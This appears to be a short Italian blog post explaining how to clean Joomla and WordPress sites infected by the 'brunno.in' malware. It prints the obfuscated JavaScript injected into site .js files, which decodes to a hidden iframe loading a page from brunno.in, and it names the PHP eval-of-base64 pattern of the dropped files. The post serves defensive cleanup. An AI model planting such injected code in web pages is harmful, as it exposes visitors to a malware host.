Infettati da brunno.in ? brunno.in è un malware che si sta diffondendo nelle ultime ore e infetta siti sviluppati in Joomla e WordPress. All’apertura dei siti il browser visualizza un messaggio come questo: “… il sito contiene malware. Il computer potrebbe prendere un virus se visiti questo sito….Google ha rilevato che se prosegui, sul tuo computer potrebbero essere installati software dannosi” .

Inoltre, Google potrebbe inserire in SERP, prima dello snippet, “Questo sito potrebbe arrecare danni al tuo computer”.

Se controllate i file .js scoprite subito il mistero, in quanto troverete nuovi file .js rinominati js.php. Nella maggior parte dei casi il problema si risolve ripristinando i file .js. Quindi, rimuovi tutti i file .js.php: puoi individuare i file malevoli dalla dimensione che risulta essere sempre uguale ( 25.354 kb),  iniziano tutti con questo codice <?php eval(gzinflate(base64_decode.

Alla fine fine dei file js originali troverete un codice criptato che deve essere eliminato:
if (undefined === window.dbaaccddcbe) document.write(String.
fromCharCode(60,105,102,114,97,109,101,32,102,114,97,109,101
,98,111,114,100,101,114,61,34,48,34,32,119,105,100,116,104,6
1,34,49,48,34,32,104,101,105,103,104,116,61,34,49,48,34,32,1
15,114,99,61,34,104,116,116,112,58,47,47,98,114,117,110,110,
111,46,105,110,47,115,104,111,119,116,104,114,101,97,100,46,
112,104,112,63,116,61,51,55,50,50,48,51,51,56,34,62,60,47,10
5,102,114,97,109,101,62));


Un consiglio, per individuare i file modificati dal malware controllate la data dell’ultima modifica dei file javascript, sicuramente la modifica sarà recente.